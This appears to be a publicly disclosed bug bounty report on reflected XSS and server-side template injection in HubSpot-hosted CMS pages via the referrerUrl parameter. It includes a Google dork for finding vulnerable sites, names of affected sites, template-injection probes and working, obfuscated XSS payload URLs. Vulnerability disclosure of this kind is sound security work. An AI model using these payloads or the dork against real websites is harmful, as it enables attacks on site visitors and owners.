Reflected XSS and Server Side Template Injection in all HubSpot CMSes
State Resolved (Closed)
Disclosed publicly 2018-09-11T16:27:49.487Z
Reported To
Weakness none
Bounty
Collapse
Summary by m7mdharoun

While I was trying to catch a bug in @inflection Program I started to test goodhire.com It was in Scope But I didn't see it was have a Hubspot CMS After many time of testing I've found a Small Potential Server Side Template Injection
Then by some help from @fransrosen he helped me to break the elements and get a reflected XSS


The dork of Google was ( inurl:/_hcms/)


More than 1000 Websites Uses HubSpot was affected

Some affected Websites :

www.hubspot.com
blog.bugcrowd.com
cashflows.com
pages.bugcrowd.com
www.itbit.com
goodhire.com

It was great to see the HubSpot team resolve this issue within 24 hours of knowing that there was a problem!


Timeline
submitted a report to HubSpot .
2018-01-22T20:29:20.000Z

Really I don't know why BugCrowd team closed my submission as N/A

They mentioned that Not in Scope ?!

So I reported it again in another submission But this Time I messaged the Security Company Directly and triaged and Fixed in 2 Days` .


Full Poc :

I was found in this path /_hcms/cta so this mean that controlled by Hubspot service ..

The affected Parameter was ?referrerUrl=

First Possible Server Side template injection :

Server-side template injection occurs when user-controlled input is embedded into a server-side template, allowing users to inject template directives. This allows an attacker to inject malicious template directives and possibly execute arbitrary code on the affected server.

URL encoded GET input referrerUrl was set to {{7*7}}

The response contained the result of the evaluated expression: 49
I tried to exploit it by jinja Injection But I failed I got
Malformed escape pair at index 78: https://www.example.com/content-rendering/v1/public/_hcms/cta?referrerUrl=%7B%for%20c%20in%20%5B1,2,3%5D%20%%7D%7B%7Bc,c,c%7D%7D%7B%%20endfor%20%%7D
Or
Illegal character in query at index 81:


Now Reflected XSS

@fransrosen was able to Break out the element By this Payload
{%25+macro+field(x)+%25}www.com{{x}}+<b>ok</b>{%25+endmacro+%25}{{+field(1)%7curlize+}}

Poc example :

https://www.example.com/_hcms/cta?referrerUrl=%7B%25+macro+field(x)+%25%7Dwww.com%7B%7Bx%7D%7D+<b>ok</b>{%25+endmacro+%25}{{+field(1)%7curlize+}}

XSS Payload was Awesome :)

{%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:""//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}

Report Status : 22/1/2018
HubSpot_Security changed the priority to P2
HubSpot_Security rewarded 20 points to you
HubSpot_Security changed the state to Resolved 23/1/2018

Regards,
Frans

m7mdharoun Activities::BugResolved
2018-01-23T20:29:20.000Z


m7mdharoun Activities::ReportBecamePublic
2018-09-11T16:27:49.595Z


m7mdharoun Activities::ReportSeverityUpdated
2018-09-11T16:31:03.207Z